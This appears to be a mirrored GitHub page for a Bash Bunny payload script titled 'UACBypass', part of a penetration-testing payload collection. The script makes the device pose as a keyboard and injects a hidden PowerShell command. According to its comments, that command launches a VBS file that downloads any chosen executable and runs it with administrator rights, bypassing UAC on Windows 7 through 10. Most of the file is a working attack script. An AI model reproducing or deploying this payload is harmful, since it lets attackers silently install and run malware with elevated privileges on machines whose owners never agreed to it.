mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
5a77792c1d
* Updated all Payloads for Version 1.2+ Fixed Style Issues on extensions and payloads. Added GET TARGET_OS to get.sh Removed and Fixed all uses ducky_helper.sh (Issue #248) Removed all mention of DUCKY_LANG (Issue #248) Renamed Payloads with spaces in name Added an extension to keep Macs Happy Added a payload for Mac DNS poisoning Fixed Issue #271 changed wget to curl -o Implemented PR #268 Implemented PR #273 * Fixed e.cmd * Fix e.cmd pt2 * Fixed Issues Fixed issues pointed out by @sebkinne Fixed styling errors
38 lines
1.2 KiB
Plaintext
38 lines
1.2 KiB
Plaintext
# Title: UACBypass
|
|
# Author: Skiddie
|
|
# Version: 1.1
|
|
# Target: Windows
|
|
#
|
|
# Download and executes any binary executable with administrator privileges WITHOUT
|
|
# prompting the user for administrator rights (aka UAC bypass/exploit)
|
|
# Please define URL and SAVEFILENAME in the a.vbs script
|
|
# Target does need internet connection
|
|
# Works on Windows 7 - Windows 10
|
|
# The UAC bypass was patched in Win10 V.1607, the file will still execute but with normal user privliges
|
|
# However from what i am aware version 7,8 and 8.1 are still effected
|
|
# Currently fastest download and execute for HID attacks to date. (with UAC bypass)
|
|
|
|
#Define your bunny storage stick name
|
|
DRIVER_LABEL='BashBunny'
|
|
|
|
#RED means starting
|
|
LED SETUP
|
|
|
|
#Gets File locations
|
|
GET SWITCH_POSITION
|
|
|
|
#We are a keyboard
|
|
ATTACKMODE HID STORAGE
|
|
|
|
|
|
QUACK DELAY 500
|
|
RUN WIN powershell -windowstyle hidden ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'payloads\\$SWITCH_POSITION\a.vbs')"
|
|
QUACK DELAY 1000
|
|
|
|
# GREEN means finished
|
|
LED G
|
|
|
|
#If you would like to bash bunny to shutdown/exit/dismount from the target system after execution, you can uncomment the lines below
|
|
#QUACK DELAY 4500
|
|
#shutdown 0
|